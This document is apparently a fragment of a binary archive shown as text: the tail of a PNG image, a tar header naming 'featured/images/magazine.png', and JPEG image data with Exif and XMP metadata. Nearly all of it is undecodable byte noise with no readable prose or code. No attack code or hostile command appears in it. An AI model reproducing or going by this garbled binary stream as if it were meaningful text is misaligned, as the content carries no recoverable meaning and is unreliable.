p�a����/|H�����̇a��3���(�p��������^u�'S��L�O5"*~	��*�����*zM��f{`�,a�:�}���ΠL��uC�EX���	@�sy��{�`���uJ�6�"�H�����0�11�rL��7
H�5�k���P���B3/���t43�@�#�#�X�1|�q�
�a��R`�>vj\v�������p�?��b���g��6����DQ���!ұ�^��u?r�z8�*��>�p���x���ON���t��`7�!+�8t�*�'�i��.�B��LÊr$n0�I ��덌>�[���^C��~�'�<���e����^k�B�!-TX\��ڛAT�ʉQ��K�OQ�P��
۰tD�B��ɒn��
��Jy%�\��/���f�K�|Ͽ��ߝ�⪓F��&W�{��t��ӱ����
<z����:�PMJ}��qJ������6������}�6���yO�_�]�H���q�'�%��'�
�8�l���G�p�[�2�X�7:�e�f�V֑U7��_#��\pC�,z�D�qc��D���#�B��;��4NPU���d<y�4e�ۻ�\��'��egLD~f��d���^��Ҍ!鈆hQ
��ce65����m*?�/���#�z���#�5��G�[֮��v�;[���'39	��2J��T��ރ��V`�q8��w��YXO0?��#h2��`�����k�$bdt�YF��8��A�[�w�׭0s�GĢ�������� �]��|�x�N���wcV�3�GT�Pи�����g�R1��t�"fڬ.hXƙ�-��	�׸�	x�KP�c=0�<\�h����v]yι�aR��_�f���G�x'��U_�?I���&��[<��X����f��[ы��Ro�E��%�-@4�Wt��>J���{���ߧ̭����/ƽ�9x����w⋐\��ΡQ�+‰��Q�X�'��sij����;���C�p�7Né�@#����7�F��j��.�"[V!Ds�2���єo�O��g�>ر�A5��2Χs�nj�)J;����ɣ����-����{����T�9��x���g?ƷN�;�҈�k�ʚf���gˌ�d��q)�O"�%ۍ�J���`��R�����Ldž;nƺ7`ʀF7�v뒱c��m7a��m�}�O�,S�ӡE�%|�����F�������$q$5-�&���<��wQ�}'n:u�M���;7\�)����D�	k���奪�CH.�Ct�=���m�և��d�a�G ,�~N�����n��{h�ħ���4a#��w��kg=� Wo�u�h6���"�z�i3L�!PlFPE��2�f)~��U(Y����y�Nè޽q�9�	��@��N�fUT��G$�DCs1zԼ��U|��L�ׅkƍV�2��@�i
vUUaʬGT�(RҌ����(<��b<�������}�{^|:�e-�Z1W�P�K4��1�;��Uͬ���С��w��7�z0j(ٸ	�u���Sjl���A�^y���a�zA�'!6�MiG�Wj2�20a`���<�x��Ԇ����|�[��N�E�(T���,�}�H.�n�]���
��-��1i�`�~��>#�2�'د�@�)Vw�)*�!�Ϊ趼p�H�[M5����r6f�3	��yH��O6���%��a�Q��.?�$L�X���O�B����I�z��)<H����1�ܢ�&����Ra/���bRJQf����t_/n،�,�an�sP��/���cN��?��q{ƮC�,�t{�܄���*;K(��'J���5���ig�B�
�az��y��lo9�]��R�Sx���mہ�|�V|��HV�ۏ�����Lx��i�j��{�u()݋ݕ��e���Ż[vbDN6�R�~U�ؽO-Y��ד]ss�q
J�TKw��SQ��꥟���x�X�w?2�_��IɊ=nY�R����O�����oSd|Ԩ&�V�%Ο0g�W���Z�C�y���h��C����a�S�.���3����T5*��E�d�����^�B�B.��(�
G�?#�� d�ex�ɗ��F�{��H���3b�_B��T��L�O�����Cj2uc��߅i.t5=|>n$ch�>F����!�SSQ�j1�j���bb"3ɏ�;�7 &@����Q��ύ�q�X����1�G�}�0D:W�@��G����zTV0Dt7��RK�A2�_TI^D�, }ߠ��fCF%��1�(�

i^u��1�=�I�2�h7�*��X7�@O���ۋ���h~D��rY-�j�ܢ�U���&#���C���E}���\y'<y�G�7�T�#z�� �kf�S7��Zn%ik������u-��k������Q��蠤z������IOM2�t�YT��v�x M��9My:L}���]����i����53M̤%v@4�dL}�#ч�$9�il�_���Q�Q�g*#�L�-�W�1�*ݪ�l�����1�.�$�Ge8#�p����gi*GN׏���D�sR�5��4���x���Zfb����B�k蒦������6���]��Q۶C���wΫ*��Ca��	��j�*[y�W�ܫ[�Ơh�t���'(vu�����R�׌���c�@!m��ݗ%�`쵘��_[@!���wT�=Y��&L���o�EEkm�Ӻ�%l��j�������5t__"F���m�g[A!]�rT�XB��Ͱ��kQ�@���g9�螀h�%����n(�y��i��,���\\A��{�C<�LG-�Ͱ��)WP�K�ɳ<�
�z���l�AѨm�<Ӟc��)D�<�;u
(�h# �IL�3A!�2O�-GM]c6���ղ���Ŕ��{����� 3xBAG]�m D�q.E7v�Xa
�u���u]w��	~����f�K)���#NjYy%nE���^B��h�5;&��x5�GX��FB���ᾎ��S��y��<O���j��
��D��T9�A��в
 ���h�,фٸq��(��"r��������A��(����=5��N{����/
˱��s-��2ǏY�/e�mٗ��{��q~��L�B��a6d�qyKq���b���s�p�p9/d��x��1��4q+���4򕼐yA�`t���<C�{0�琈w|΋��n&��f�ݩ�" $4�W���h�(ikd!���@�F�!Τ�� d�tʛ�8OK��@�Nj��>���7�3�5JL٣�!�v��D���%�v���E�������N;�1?+1�BrJ��ү�<�D�Bڽ������լW-;�"��2���f��C<��s�P(�`p�	��lN��1 b�<#r�Dy�3�1&(�y����@ ������K�����n���w�����X�`���X���7�ߗ�d
�ј쀈1�)M�VLГA!m�1��1���D���8��Y�`�ݙl�S.A��ɠ�v�>Ʒ�Q�P~E`(?�XGc0���C;��p?�whg9]BA���ι��;�)��"�5���b)�)0��kf\���W�'��n����C.G��~ώ�)��_CD�ag�����V���ID��x�s(��������jv�͔��#! N��Q;8�@�}m���L�=��a*��y��1D�h�k�p�uv���dA�Z��Ec�H4H���g����.�|C0�Q���f	�5�gd�o��y�� ȵ���M�� v���]q�wy6����Yc�|{�)�<����U-f���������yniT�T��(�S4�����/smM��VA��l�t����'��Zz�Ћ(�Q�ԚC,p4�M
�7Vvcp�_�ҊWxJ�A�x��B̶��;���t�?��b*XJ�.�r���X@hlJZc2+?�k��M��S���gn{S�L���oS��	���c������-]
�T�<F)sU~���0Es�SS~G�qy��󉔱H��v�'�wf|c[�2#̓c��b��#�IJt0e$e��RH�Mɡ�}�j.�D՘�r3R�G�	�jZި�Ƥ-�l���T];�qsJ����i(���i(�����·��8��IEND�B`�featured/images/magazine.png000060400000073107152434416630012125 0ustar00���JFIF���ExifII*1&i�.Google�0220	�d��p
	���R980100��dhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.1.2"> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmp:CreatorTool="Google"/> </rdf:RDF> </x:xmpmeta>   <?xpacket end="w"?>���





		



		


	



























��
="��	
��^					!"12#ABQR�	3STabq�Crs������$��%4c����Ԅ��&6du����5DUV�������=!1AQaq�"2R�������3��#Bb�����r��?�vO��c���$Ƥ��I%W���0��~�.C�P��?qq�Α~�=��/z3IO�GI-V�"U��4iKo�W-�|���~!��c��p�C���'�����S�OA-5c�@�5"�|l�8�"��{�
[����7�T�\���w�F�dw��������B2x����O���?3��ˊ/�[���3	��h�٩�E�~/���>�W�ɽ�o;]qzjJ*�5��z]Z��FdX���+�ĥ5�^0!Zo��1����^!��c��qB2μK���G�[;=={�J���K*��țww4E���Yn�}bI��V�$��Q��$Ҿ�
��ʱ�+Z���!|C���'����:*
ڪ_��
ʻ��[��9;���xq��6]��0T��T�J���|�"y9��Em�H���.�WV\��if�/�if!�����PwXz+�*��y7
.��x�;����xk�$���*��F�"_�G�O�쫯�JM��;�e�(�^���d4���!j�W�]!��q��Z�m�C/_0�A��5��U���]'�65���K��Gyp��ea�]qZw�VwF��=�u*�d0�,Pɸ�w���ڇK�>�����0��~�.*WA�m*�v�7ɚ��:|�)<ɾ�0����dnY=u@�N��3F��)�i7�%��`Tf�Ro���D�zx��~��Ƃ�U��?3��˅�~f?q?�K�θu������R�$YN��x���7�H��[�ŏ.��}��D�l�j�I���́X�*��=W�	+�ү��1����^!��c��p+�϶��],���es��G'Uh��|�G5�zx2aP��C���'��x����O�Æ1�7�"��?3��˅�~f?q?�7��p���p!}�?3��˅�~f?q?�7��p���p!}�?3��˅�~f?q?�7��p���p!}�?3��˅�~f?q?�7��p���p!}�?3��˅�~f?q?�7��p���p!}�?3��˅�~f?q?�7��p���p!}�?3��˅�~f?q?�7��p���p!}�?3��˅�~f?q?�7��p���p!}�?3��˅�~f?q?�7��p���p!}�?3��ˈ_Ht���cQ�ڀ���x��6��!='v��ja
P���C�4���:g�/�zG@�=5;WC�hjj�7s�����~Jѧ�.+Rl�Ga�Jri���$�̪��t�UfKZmҬ��Ic�X
P���;j��6�沩>/�r̶"ݢgzu�#�:�i��Y^��
��<�Zl�n�5.`�� "�yZ��W���l�:.�ةj()�zW��e�����Y�[���z�?*yU��fL�l��J%D�-ie��2,Ȉ���&�I��N���L"Uͽ��~l�3�J����APj�d+
�R��S��$��Ud���=`��,�n�Ʊ��VA��Z5G���x�z0��7��v.ON�yN`�R�\�P�L���@��,oL�H��Z���{�'�ݴ����H(*2֪��DT�H���"Gb*�&�&�:�R�;�*k�g�6iCW��vҞ�*��S�"�cO���uY��]�c?�k�̕u�;��ه�Gc[IL���,����G��J�I��O�1��W6Nף� bk�gE�@����oa�z�ؚ;�4ēgr����M4҅�j���YZ�0B�q�Yy4�8��W����l���u9;D|��U�
�ȷ��Ց*���x��M=/E�@\��ɪ�ïm;O���
�U˶3��Z���yh�zyj�h�z�}�M-������K���
���ƆV����bi�/�ط�bꮓ��{���eCP���&V���uY�Y���1y�n�/�C�ƃ�S���y�P�0�T�������ls#�ζմ ���w�s�";�@�B�d�_G���C3��K�R�cM�.��i	�,_
�6�ԩ��v�L�pϙX�����~���I����@��d��m����:�$��Є��T�P�-J���=�裠̶9�iqWft�J�������"���E�~藫�W�-J�Q-"հ��C� v
�I��/����B#Ԛ��9�k|�!�c��m[����g���xZM>�u@�xj02m��r�Dc�c���!���;їU�-��Z�)d����dz�
��I3�kr�MSF�6�P�|EԒN�0�?��$.�H:��]��?]�0L��� ��s�XY��w���·��r���.�Z(�}쨯4�����<��tiۂr�0�f��ÁC�������ɩ�ىU�r;�7�ſ

�g�꺴r2��yC�X|ݎ/ti٧������Ok���1R�GjG�;w��|�2x�C�*�vRO
�]���#��h{F������[�v~n��z��%EU#Mh���2fd4���"��
�뽯����q�G5:/;�Kԛ@'����Bg�3Z�&�9��[U����f/v��S	�hO#:���x�(׉.����ۯg����t�]�v��֯z��ly��\$�ʬ��+(칹���p�����9��E���x#Cô{8�I�㯬�}��N�i�>�R%����z�����a��16���'����L!JH�L��cIj���4��F�+��q�^˾�׷�c~�b�dH�JH%f�5y#�����������/�a���	��{.�dx�a�rߥ��)����/�R����|^Q}��0�OQ��za˼�����4�zGʐ�������V�lI>/(��K�����yE�
_��<FG�]��x}k��}2�L;�^Q}��0�O�������x2�&s�[����fۜ��--#ufa$�d�%_�_@��L?�����/�a��%�;��-2o���b�\y�-2on�݇�q-����/�a�����)S��K���N͞��	�.�2����c��>_��}�?��/�R����|^Q}��0�O	��g�>_��}��ϗ�6xa��������x_�_@��L?��a6|s�M��_��a���/(��K�����yE�
_��<Fg�>_��}Ꮯ��a��>/(��K�����yE�
_��<FW�._��}��˗�2xa��������x_�_@��L?��a5|r�L��_��!��~/(��K�����yE�
_��<FW�._��}��˗�2xa��������x_�_@��L?��a5|r�L��_��!��~/(��K�����yE�
_��<FW�._��}��˗�2xa��������x_�_@��L?��a5|r�L��_��!��~/(��K�����yE�
_��<FW�._��}��˗�2xa��������x_�_@��L?��a5|r�L��_��!��~/(��K�����yE�
_��<FW�._��}��˗�2xa��������x_�_@��L?��a5�s�M��gڍ���bxeY�Yв@`"b�~���Y�yE�
_��<E��'�!�p�.�cX�k�Ԓ�t�E�>��y�C�4���h�"��y"��L��N�ncG
y���kymG���'��8x~M?qp$�a�I�EX4I5�L[E��lF���@P�8����}bC�tm��4$W�~�(eS�G�Gu։�����cm���a�f�{ P%�������f��)�դ�͏U1V�yix
x���X��R��>EJ<>��~a� �b��jP��;���bS�+��uj�Y�&�閴v-)�k�i��g^��}t��q��?��z��a����~�=^V�H���O��q
ƫ2��F��y��,�cKwqy���1'�ؚ���	uGx�`�%TWS5�����`}����?����HY�fC.eGT&s$j�o�{7	���H�Լ�o��P&d����2�T������K�y҆��
��S��.�qg�L�%̪�bwq,�L�0G&�x�V�x 
���U�m����CҾo���p�)���>�ӮE~Q2H�uMS&�Du0�T�I#;���ww|�QƨV�g�?��*�!�q���W_.�6Fi��$̤���h�[��w]m�������z���G5=FDhj�"�.*<���>�y�5tP�JF���oQu@(�1�H��Yd�}�LF�%o��#�Z�t?��v�EL�f�I0I�*�A45�ug��wC
���j����~dH��g)#�^�0]��\�lt�O��Z�wl�n=>o�a����� YL5�M�ؐŷ��w�C,�VmH�\I���p�t̉��z(;K�bz����s�Z���CS`UA6��;���\���e� V���Q��f<}�a�������Mu!g�~,J�~�(�ge1�fg�C��tVK&%�A�^J�,���4/�>t�܌�����H7)����Ǣȶ5������c�޳�w[A@�ѩ�8F6߻�����E�K0P�UEGA
��i�m[��Go{>�6�S��&��<��D�*�Y��4�I\Z���F�.}϶��c�9�™Q�X��k�5��Ί��6
yZ<��f��h2�UK�$�TU��	�����7?�^���4��m�4�\���rQ�@���E���fE��ˍ�c�	Z�n�#@�o9�ܛ�?!�F�xn�.��*a�hގX�M�I���9�5)z��<w������f@�N��[۳��\�n��f,OSQ�
���7Q3�	R�+`I"�y�݂>+_�h<��n�e?)4��_�c�&"[{�u��u'���oE4bv{5Q�nnX����nο��������c��oIsS�4u�Rm%�$�E�!B9��.&�u�̫�ښ碣��b�B�9U[���Ef8HHi8*�ac��y��T�,�$�x�����*YQ/.��#=
|+u��g(��W�8��ʆ]d�c�7w��b�,#��+gM}b�r��EX��P�T��<�e��`�/�C]KG�I��U�s:�,�E.�t25Y[��N������-j���ц�z.��c��[~�ު�����r�FV�}�TfK�TV���kb��&�VĎ���UKV`�j�\�}(���x���H���R������f2N�ʖYc�;���Y3
���(��d�ݖ���tӫd�FO��/�m+
����ɼ����~���~[_Z�R�)7΁�Mw��o�]����Z<,s��1����r�(���i��Z���9�-�3����2jej
Jm����4�i���	u�r~��+�Iݰ�?ژxٌ�G�Y,&��0]?�b�mw<=��za&B�*�C�4��ja�˿�*�C�4��i$;����?v3�s�l�y½�x}S4�|x�3B4mu&æ7RbN�)'�C�U�x�F�-+E���-�N����r��)�0��,|��wf�x��><ѯ��Pq�nzM{�-(������q�i�=F�vw�^�vᴕ׆�hO�
N��mB�O
8ۀ�[���h�H
�`�J��uK:'�s���{	�F��1�L�x�J�U,9t���-�T�K7�L4{[s�*�ю�3�R�Z�۔Q ����8�85�����	�q}�DZ��+)N򷵁���|�5=[2D�3���ƲM�zK�K�D�m�����x�g��#�_��w�����|��˪��$�F����Pi�
��p\MW#�z�PI��)����J�OH$2馀�
�v-�O�Ϗ�,w�`��Q�
xi��:���(՗|���"���l;D�Wgf<����aUsTק����(桀�,�F�23�<I!�Q�U[�\v{�g�I��[�V��hO4�&_K̛���h����;���g��P����M���������8O6���c���x��	)�jW��?*&���͂�U@H�x��3��>�3��e�|�g͵ۨ�P�uQQ,��uFs�@�����ۥ�WH�T�+I,t��	eT��V-$��i�N_��ѧ'�NIr�ɺ9��^�8�Q#g!9�D�V��v*�H=x٫�-�$TfA]P�R�;A�4��k[�����Ӭ�ב$Š��' *�di��4^�{|�k���O<��^yl����
{�v
�E*&����
U��kXS&1'��N�^|�TQUI�VpЖ�$S1��QF�}�}|ز�lz�,�H��I�$�ȯd�0^�7|�5Ɨ\��RT�T�LP�D��	#��M�Y��m왆��U�Sxd��	���4h'yҶ�eluk_�aqZ~h1�۱{CI�
���W/�V�̩wq�Q*��D4���=2���U���S�EY��Dm��i~�{vI=�TN���nZ��ѻK�d�9-���y�2�,��k�o2���KU���%�C��ŕ'v�9�����'���+e��T�8� �G�<P�1Az ���ȫeCN��zU(,�99y��n�:8/[%UE5�ӵ�F�̖��e-�p�u�.�M��"�ǖ�I���R@We�1=�I�q�S�j}L'�54�����2	X9"Q��G:
9���<~��74�Qx9����ͥ�EFha�)���e[�O��pQߴ%�7�~Zo�q�-�|���d'�*a?��z&�A^�=�w)Rk\v4�
}!ǩ�ʀ|ta3�P4	$zPa'��Yv�=b�[�c�]Nr	i������N���Q|o����=�]c�G޸��q��UCw��X�*t6��-��PFI��[��VXs(H�-u;��7��]�%������+2g��\{�/��iS�ɷ�.�������E���\�L��d�<{�/�.}h���
�w#2
~��&��`ͱuSQ{����:eM.Q�Ѫ����Q�f�\����w���J�^���^�ڐ�<��x��Z�ڵ|�kS���uw�#4��O�Op�R�o'"%+
Lr>���1pz(�����e���-}MLqӋ�Q,�b��#N�7:�Y9�G̦�L�1�t{e�L}�
}�/��dx�uq�k)�i`4�
SD�n@��I��+�O�ߒ��G�Xe��!�Rl����]��Z���b>�0zʻ���?qp�W�*���]�:c=�?����W</���-V�����1�j_����j��o�����R<���H����Nܠ�#����ޅxwH�F�ՍjZ>U@Ӱ�8ۥ�@
1�NG���˪�{>�N4��S0y������Lafa�Ři���52T�#�Ch�o���k��Ʈ�"�`�q	��{WB1���"�P�#:[qc����ᥪ.�[�'R|�VQh���#��SWC���e^W&S�W�d���"���t�$��eDs���qcR��N��"n�GoE��W���FVׯ��
��]O
m�j}e�_G�hx:�3�W5��h�Dx=1����<�,:����D�8zw���<��i�|�,g�xX�����ԓ��8Z;u�c@ ��'��=c.�k�xi�?����N�N�8ie��6*S�j5�䑑.���᷑LK��:�D\�4r
#����l�i�*b����1��U4Bn�@~S�����N������i5<�c�w�F}����W�p��
�6-אP���N=gᚂ
j̖Ie�eA]���>�愺�tˈ�N=p���ir�jdU�ye�$w1D@9��7ً=և YT�dj��dЩ���g�69YAѼ����b(L��ڱD	��i���Q-/:��)�o�7���>o�MR�H����4U]U8(���wӣ�=dQ@�w���2Y�����&�Pu?��/���;U��9�{����V��f���KS���F�G�Vxkɪ"�&da��tk�s*ܒ3b���K��8p;�eu�m�(W&�HZ�g���=)t�-._U2<�#�$MP���p�)�f���}����!�%��ٕ:TO��#Cd�p���y�?��ʒ��YU�
%B4��e��+$��ʪ܉�LI�o���)��i�b�Z�P�v�y~�"X�ѧ��~��>j��
�����L�󴞊
׋�Ju���:uO��-&�qT���[s#�`��K�h���?�1��UM��]s_@�0�R6(e�X���.
�tAG����#�D�{��BY�n�ذ��N[��m�f���gphVsu6&	;��"��&F<�p��=ڟIė��vۚl�	��"����ӃIQ1�����LH������j�N&:UyJ��w�F��ت�d�٦��L��;���
x��4d�ɼ򍈄�ʭC?=� �
��e�����ܺ`Eƺ��>~�O#����N���w��
�_$��]G�.)��-ѕNcK�%,Bw��.E
���ł��1��؜,�L�C.��=e/�V��m��ᎍg1r�����]��l��,�vUOA%?��Y$�;���m��<�3�J�K�2n\@�)����=�^�5���xR'*��*�=D�9��I����+9��Oq���J�l�u�9rU�㐃!�N�s5�Iv
y��gU1D�V�HM�$ h•F(��,�:,��\�E�K2�����W<����
��D.�&�$��ޞ�f����Wcx$edB���>��u6a�U�4|�rj�ɟ�3�h�Q����>��FZ�맄.�z���:�u2]hF!�V=<����[���<Ӏ��B���Jv�&��5;ȕ�|mG���5�\r�1>��`��l�DiƾW]@�GO6���h��:Zy9��vG
�b�$�=�y�'U��n�瑧4�t��a!��ښ��]?50�@)	%Z���B���[�ܣ�y���}�#�{��u,�lf�gu;�����ke�!���}�#ţ=��;�*M�w!�~������*�*<��u8?�]�F���m=a�4�����l7�f�����xT�tt���<<@�O
���f!��	�>���7o÷�1�:�^���q�0�#d���������	�z��x�����~�=�V3,�i�}g��5�bA@3��)�0�<lj׳��]yu�̀�ǝ�1M\	]أ�,K��u,8���{tŧ��wә�8�n���0��xچ�9�*�<J��κ[5������a҇2_mH$�i��0��Kd"$`d��T������7*���_�D�6`����A��,m���h��E�D�i$���Շ���i!׀�׳���vgh^A�q:p�,�=!�rH�=��p�vSOn!>g5�	�Mx�����.m�bZ����]�jDn5I}�y����_4�v��x�U�a�jym_k���@����:�i����2�<���y�ʀ�
r��0�=��\Ɛ�I"0Fԕcp}H����mni�T���x�azF�l���wr�b���|�A+g�ԩ��7�:&��ߣ��W
����K'T{�˙�����N��i�),�\Ѵ�
}��/"n	�7���Ts�%��
�����[?؟s������
�D�XM�Y�*��G�391�S�=X�[J�����"I<��΢�!&�˛���x���H��pߔY"MIiQ��1�-��:L�*�1򴊡�Vfv��f�}�V߹��#�c��Ԥ��>ᤴ$���3�c�Ǥ�)$%|�r�+���/�ّqj6Si��T4U
X�*J����6(G�hY|���
A�bZ�<ޣ�����q�F(qv�ŏظA�y���|�\-�1D��:���]��=�=&�Mڜ�}4�i����_@{�ә;5bt�ԓ�q��9IՔh�� �N�w�
�
�K�5���,}G<���@h��zN����ãi)��P&1<���!�D���__���|���~0&�hk���,K#��6F���y�6�0�X㎀S�St�ԋ5B8(�y����8̬�VHl���y$:I��f�{ظ�oM�C�g9������{^�z� ���;	�0���)�e3G�"h_U��f`��5	M-bTf0���x裦��YSz���)����)VG-�2�u��Z�JiY|�PG'`U{���Ө�T�4m�U�\�c"<��"��f=X�nR_gL4�t
j+j'e7�b`�q0��(� =Tz��4h�>�5�!9�M>���j��B�7i�7����93�]�T`)�.�S�1h�D�S b�5;�$_G�'P�’.�(<��\�۬�k�Y�]��
�&�K�+bj��\<�{��9ˏ�<_��v�!${�[��隊�q�k�򏮲�
�6=7K�* ���s�fq�MJXOiN9њ���Ye����]?>^[��e�7�:K�Ժ���6�4�Y
��YE�u�{WK�˦v�k����6I$�M��n��d��5vl��I�3��s[��":f����뮤�~W�m]B��M#nY;G9�]~�����Y��j>*�-�����r��~���w-��5�'�3�G���dv.��/@�!�Iv�C��*]�I@u#�J�pv�ہ��������k��1�S�&�qj���_{������R�,�(�rH4k��i��f���}�#Ķ89��Est��&ʻ���?qpژDŽ�������U܇�i���6������˧����@��}�W<*{GGO�h�}5<?���Cw����wq�F���-?�:�Ì|-FH_m8�p>>2n���oߌ4l=@�N����b��@xـ	�!�$=��v&�f�yF���m-Ϋ���iF���iՍ	i������*^&}��!�H{n� �7UO�ڨ��z��[���Ig2S-6�%iQ�U�D�]�a*&�c��r,�O{�v���c��Z��>���-�U`���ͻ$$��{Y����:�¶���#�[�{+�b��Y�96��M{Hok�]��F�[j�9}zv`kI8H�5P�릭p^�77��}��V^Ҡ3�٫q���Ǚ����#EQ�Q�oEW���-��nc��oK���
&u%�ei,R���H�])R>��
M;R��0ex<#���C�@��@��D��S0Ѹ��?߁��twKZ"I�Y����Z@�4g�>�"���'<�T��þH�w���
���RĪ�@9�\T���D݅��I
ݭ�F�~�l@v{a(dfC_SYSKsM��nY�5�j�5��Q��j+��S���9 ��oŊ��M ����j>ʫ�t���*]�mD�����@څ'�+���Δ�Ҫ�J�P��3�b����b~RO��`Օ�&�E��J�$AU#���K9����.�)`'H��+����
���eU�5+�'���'���-6D��p�?9\�v-�uS��M�q��5
��>�8u�ۨ���vF�Za��uV[������oA�/���8�a}7K�;coI���1�"F�'�(�����ē�j�+��*Q��pmp�܃����3�
OS�j��&	�vy�����iRDj��zMd�:��nX�3�- �%t�hzk��۪P`H�S���
t�$.i��*��G��������z�V�E-5-����$�d��[I�aU�D��.�t���1|(Tܘ_*�aun��CxNk��y�q�����G�`�t������šG��[�!��4V:�A#��q �6%�']ބk������`���L�ۜ���[IC�d�L��&����m��mY��fU��&�?�w��O�F�_<�[�D�\S�zX{���c*����Y�mm� ��:��Z��;��r$mg$���ē����#U#��̭��#�sf�� 7���We���>�o��Mr���AT��%���P�t�2P�.�۷g�c(˪"�W^�Iį �V�v��w{�Hv�Z.�	�q*�:O�K4���EH�tF:y�2��â�@i򅈓k�%��<�����UvSM�g&�xܖ��1@��i�r�<O��F�l$�T�o�0*��!�f�u�n�3�CU2T�!��E�2|�E�`_�t�1jY0�b�WN�j�u�5��9�+��	
�mIIe�+㣒MB�u<���y�797J�㹫�4�6�zť�`�7Ht�JI/#�$�`}`�8	e�3Jm�F
�UF��K�0�+i�+���]���p�eL�D!�*ɢ
�J��K
�����<��e�2<��~�mZ��^Q��˷����G�b��.*K�w!�~�����_���쫹���l��*���_�;��x�
������o���7�MXdU��WN�{1�h��t׈�?{���˧
=|3[��hvaC�Ğ'�3LJ��0�%=������t*��뇨�A�dO+kH�lr�svZ�}�"�G��q��,ycA�1=��a�#���"]ڐ�?�b����u(� �i�ִ��H���D�<� ��f�'��kO31r4vS����z${�o]5q�n6���:m�3H�g�>.�8�G���U��Y��T�P�v#o����c4���#�3
1�v}5:�-��M�F������^�}��W��n7,�m�v�F��I��Fm捻�������K=L�]�;�ag��\y�|ʹ�3��2ڍZ~�Q s���N��s�"�rQ��I��2�RjgkYY~j�x|蒮G���a���҃�i�O¥pݶ����j$1�@�S3�t
��ʿ)s7*a\&<W
0O�q�U������TT#�%ѬjbEs��K��k�B������5&V�Y#�>6�*�4_iW)�^Q�5d)�Y�b���d�v�z�ۅ_'�>zEޕ�������N*n�B3r�4j?�~I��C�|I�Ps�Y#�y*&� S3�T���w�P��4��M�a�a����y%���c��r8H#��IRF"܇�(^I�ڭ�*���5��S<��K���0R
�y��2�Ķv�“R�c��d+g�]j
��TtdJC�T��6��+~,���TH�������)���wp��1�u��2�ML+�Ļh�C�ˉ�c�қ.C'��L��������g>��V�*ŷWT�G�����(Q��t�4Q�k���i����ƻ���t�M=,���F'[a��"hmޖ��6L/ZP��:�YJ�i�a�cm���]q�+5�hn�@������`u��e2ǰ�4�q��=|0�#�c	p���X��Դ�E�7
��i�G�C����-D�3��-��� �����(��EI��v��&��b82B�
��4u:-��<J�4'�b;�
P��[��P8�^�ꐻ�0�e<pe�]D�5�P�8�n*Vg��7a�~���X�Y Ti��h��&1�2UQ��,t�]w���wxqʳ�I�:HdZ�栆�ctXLl�γ!p��aka�:醜I��GAU^m���D%�9����H��"���o?)�]#d��Ϻ�f�TT�-E2�_w���@�;$T�2�wQ��A�/��,�IUgS���B�Ʋ�CS���$�Ԥk#�J�&���VH�mc�cKg:ͯ�g��WY�RW�Ҙ
DO�X�'��4REW*I��ݲ�/R�²�r�3���g�7�X����(M�kz�1��i�Y��c���CP�:U<�9if�t�BU'�/��LSx�X��m��i�,��Y[(�6�$��c�d�����F�ȫ$\�����-��"4�a=5UMJ�H!�JS�@?��y��ob�����Y)2:<�M��%i#�Vq=2I��X�o��#p�5��j!J��)�Hwr�'�ΕQ��~
S��	H�e�ؒ��9�AM1B��P�gg@<�y�wZ�o%�ň臬��KS���ACOB��<���c�]7��3N��sS�S�q�Z5������f��ݼb�,�D�������KZ/ņɃ+�W�4P�
DEQR�WF7N����)�裛x���k�f��_W�UKkO==ѽ�i$z����IWW�`���`��)��GEJ�0!�iRF��W�~[~�
�b�䯬�t�²Gv1�
��<�a�������o�U]�e\u� ���5t���/��ت� �x�m���ɦ,H��_���#�R|�����l�>U�BG���w!�~��m��TT�ל��c7ǿ������w��h�)������8$c�q��צ0Zt�8c�V�/1�����N��ď_n1ƽ�k�~�g��Gv8����(mS�s��8R�(/$��(��s��}��Ǝ�������絝��p�4j�j��8�}G�lj)B�5"м5�~q�w���-ǺH����`�<,L����;����},�
O7$'�*�J�/�Pd���EF�8#����~�bۅ6k���"襎�)��Q��EY�D2Z���&�Q�����h�lO�O���Z�\^%�5�F����G�3�ݡ�[�`k�ֵHD�
�<v��&��f�O��/K9hI�lV�G��M�Ҧ���4�S��x�
�^�����t��#G#v�R��EO?��+O�M��M��ժ�%�;�D�}S�sGP�{�3W�%fG�p>�#^�]f5�FPE<���f�̲J�A�6�E��E���Kj
�=����ma��gP�w�^��$�}�ЦO_�C�n����0��G�}J�G"7"In%��<����:��/WI�1ICS��V����>�p������N_IXzic�Dx]YlEN`ߛ�Wԋ_M�v��e3�{*��-�Ϟ`g�a��V�D<�%��x�W��#�Ŏ�*陠V��M��
tՓ�kU�̺OdI"I���\_k�erT�=S�H��hu�8n�{��2��
T��
����B���U>a���Kb���u������2��[iS���t�
j���o�Fm4]Ywa���C�=�]]MKMK�6\&:���Z���A�fd2�W�PL"8I�^`�7�R{o5��0��ܦ�\��̸��H �C?5^:E�}Ѹ��]vz^�ǜ���%P�MN�FU���X�B�Nm��'��]�Ҕ=D�I%T�@x,����d��|����w�m1_N@�u������Kt��sƸ�׶柫��[�A��3^�'�1���8�"v���HoTV���lH�n��Z�]�R�ᣵ�V���m�չ6@�1���g嘻�}SWڻ��n��O��1�*����a��gr����d:�%���q�߲F��~�g:��'c˔!��uo�$�a[O'��#?�GeǪ��2y�\M:3��$U���h�Bw
d.B�1t�6[m-�c
�ɲK���E�!�<�G����Ձ�E��Ϙ�CTčҳ3�����0��]��Pq2��;eխd��xU85(N�R�2�+X;ֹ�G#`q]թ�՛4��s�wi�����יEʝ�s�<��i*�@��(W[�}���וU{�����mZ�j�uRKE�	.��]�t�+[�?7�Zs	N�]�}̓A�i
�$���v�7�7��
��{�����+)eiˠTgeU�6p��ѭ�V�K�0�\�����IY�3Fe��r��e�I��
ʱ���SPl�W
I�:�`�<��2�X�F[�z����aKB�j��q,��y� jz��|�H�r<��uX��v���bu����嫧R�HY�FWt�pd�U�Vf��K����21;Z���`Mdb���i��X�7|���x)�u�dAK$�L�j�"as���˽^�g	<���F���=�c���Yܠf2*����w7���
